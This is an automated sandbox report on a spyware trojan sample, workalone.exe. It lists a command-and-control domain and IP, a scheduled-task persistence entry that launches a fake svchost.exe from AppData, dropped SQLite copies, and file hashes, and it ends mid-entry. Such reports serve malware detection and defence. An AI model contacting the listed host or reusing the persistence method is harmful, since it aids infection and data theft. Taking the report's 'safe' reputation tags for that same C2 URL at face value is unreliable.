                                                        http://schemas.xmlsoap.org/soap/actor/nextworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ns.ado/1workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://saleshor12.duckdns.org:workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          85.208.136.178
                                                          		saleshor12.duckdns.orgGermany
                                                          		33657CMCSUStrue

                                                          General Information

                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                          Analysis ID:756291
                                                          Start date and time:2022-11-30 00:06:06 +01:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 7m 33s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:workalone.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:20
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@15/29@5/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                                                          • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          00:07:08Task SchedulerRun new task: Nafifas path: "C:\Users\user\AppData\Roaming\svchost\svchost.exe"
                                                          00:07:54API Interceptor95x Sleep call for process: workalone.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASNs

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\workalone.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):612
                                                          Entropy (8bit):5.33730556823153
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21xzAbDLI4M9XKbbDLI4MWuPJKiUrRZ9I0Z7:MLUE4K5E4Ks2vsXE4qXKDE4KhK3VZ9p7
                                                          MD5:F06804B809C3212C7F29ABA89E9FAF16
                                                          SHA1:B49ED216A41EA579FF109A4BA44A8E62C2B1A3BB
                                                          SHA-256:E63AFB84BF09F02C3C19978966E610BEE5C14099B1A65C8B34E426ABC127ECB7
                                                          SHA-512:53ED48D5233FD6318320264400ACBD451A7C6B10BB2A11C2B95F51C3838708835D1016B417748E7C50023BAF179AC94CCAAE230C71AC073D0233765409341D49
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Temp\tmp10B8.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp10E8.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp1B45.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp1B56.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp4075.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp4D35.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp4D74.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp6FB4.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp6FE4.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp7EB6.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp82DA.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp8319.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tmp93B7.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.691266297898928
                                                          Encrypted:false
                                                          SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                          MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                          SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                          SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                          SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                          Malicious:false
                                                          Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                          C:\Users\user\AppData\Local\Temp\tmpA720.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.698711683401115
                                                          Encrypted:false
                                                          SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                          MD5:47643CE7571E0C995094D7CE5F2005D7
                                                          SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                          SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                          SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                          Malicious:false
                                                          Preview:HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

                                                          C:\Users\user\AppData\Local\Temp\tmpA760.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.69486718145169
                                                          Encrypted:false
                                                          SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                          MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                          SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                          SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                          SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                          Malicious:false
                                                          Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

                                                          C:\Users\user\AppData\Local\Temp\tmpA790.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694142261581685
                                                          Encrypted:false
                                                          SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                          MD5:E9AA17F314E072EBB015265FB63E77C0
                                                          SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                          SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                          SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                          Malicious:false
